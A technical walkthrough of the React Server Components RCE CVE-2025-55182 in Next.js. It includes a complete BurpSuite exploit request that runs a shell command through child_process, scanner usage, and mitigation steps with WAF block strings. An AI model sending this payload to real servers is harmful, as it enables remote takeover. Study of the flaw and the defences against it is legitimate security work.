A Technical Deep-Dive into CVE-2025-55182: React RCE PoC, react2shell-scanner Analysis, and Next.js Server Actions Exploitation
This guide covers the full CVE-2025-55182 React RCE attack chain: React RCE PoC testing, BurpSuite payload analysis, react2shell-scanner detection, React Flight vulnerabilities, Next.js Server Actions exploitation, and how to fix the issue.
Introduction
This article provides a full technical walkthrough of the CVE-2025-55182 React RCE PoC, including:
- How to set up an environment vulnerable to the React Server Components RCE
- How to execute the RCE PoC (Proof of Concept) using BurpSuite
- How to scan applications using Assetnote’s react2shell-scanner
- How to fix and mitigate Next.js Server Actions RCE
- Key insights from the original research and repositories (with attribution)
This guide emphasizes keywords relevant to PoC testing, exploit demonstration, and react2shell scanning, making it SEO-friendly for engineers researching React RCE vulnerability, Next.js RCE, or CVE-2025-55182 exploit methods.
1. Background on CVE-2025-55182 and the React RCE PoC
CVE-2025-55182 is a critical React Server Components Remote Code Execution vulnerability discovered inside the React Flight deserialization mechanism.
The vulnerability enables:
- Arbitrary object revival
- Prototype poisoning via Flight selectors
- Forced invocation of malicious
.then()handlers - Complete Remote Code Execution (RCE) on Next.js servers
Key References (Original Research)
- Original React RCE PoC & write-up (Maple3142):
https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3 - react2shell-scanner (Assetnote):
https://github.com/assetnote/react2shell-scanner
Both repositories are essential for understanding the exploit chain, and they are cited here with respect to the authors.
2. Preparing a Demo Application for PoC Testing
To test the React RCE PoC, we intentionally create a vulnerable Next.js Server Actions environment.
npm create [email protected] vulnerable-app -y
cd vulnerable-appStart the app:
npm run devYour application is now ready for CVE-2025-55182 PoC injection.

3. Running the React RCE PoC Using BurpSuite
This section focuses specifically on PoC testing, RCE exploitation, and manual payload injection
3.1 Capture the Server Action Request
Use BurpSuite to intercept the initial request.

3.2 Inject the CVE-2025-55182 PoC Payload
Below is the PoC payload derived from maple3142's React RCE PoC:
POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 459
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('xcalc');","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--Why this PoC works
$1:__proto__:then→ prototype traversal"constructor:constructor"→ unsafe revival of JS constructor_prefix→ command injection via Flight chunk processing"$@0"→ resolves the crafted chunk for execution- Payload structure matches React Flight PoC exploitation
This is exactly the behavior detected by react2shell-scanner.
3.3 Validate RCE

4. Scanning with Assetnote’s react2shell-scanner
To automate detection of React RCE / CVE-2025-55182, use:
🔗 https://github.com/assetnote/react2shell-scanner
The scanner performs:
- Prototype traversal detection
- Flight deserialization anomaly testing
- Next.js Server Actions PoC validation
- Identification of RSC endpoints vulnerable to RCE
4.1 Installing react2shell-scanner
git clone https://github.com/assetnote/react2shell-scanner
cd react2shell-scanner
pip install -r requirements.txt4.2 Running the react2shell scan
python3 scanner.py -u http://localhost:3000Output from a vulnerable target:

5. How to Fix CVE-2025-55182 (React RCE Mitigation)
5.1 Upgrade React & Next.js to patched versions
npm install next@latest react@latest react-dom@latestEnsure:
- Node.js >= 20.9.0
- Flight deserialization patches applied
Official repos (referenced respectfully):
Next.js: https://github.com/vercel/next.js
5.2 Restrict Server Actions External Packages
module.exports = {
experimental: {
serverActionsExternalPackages: []
}
}This directly mitigates PoC patterns from the React RCE exploit.
5.3 Add WAF Rules Against PoC Indicators
Block PoC signatures:
"__proto__""constructor:constructor""Next-Action""$@0""resolved_model"
5.4 Harden Node.js Runtime
- Disable dangerous APIs
- Run non-root
- Sandbox (gVisor / Firecracker)
- Monitor subprocess calls
5.5 Monitor Indicators of React RCE Exploitation
Look for:
- Multipart anomalies
- Unexpected Next-Action execution patterns
- react2shell-like probing attempts
- Suspicious prototype traversal strings
6. Conclusion
This article demonstrated:
- A full React RCE PoC walkthrough
- Manual exploitation using BurpSuite
- Automated scanning using react2shell-scanner
- Proper mitigation steps for CVE-2025-55182
- Attribution to original researchers and repo authors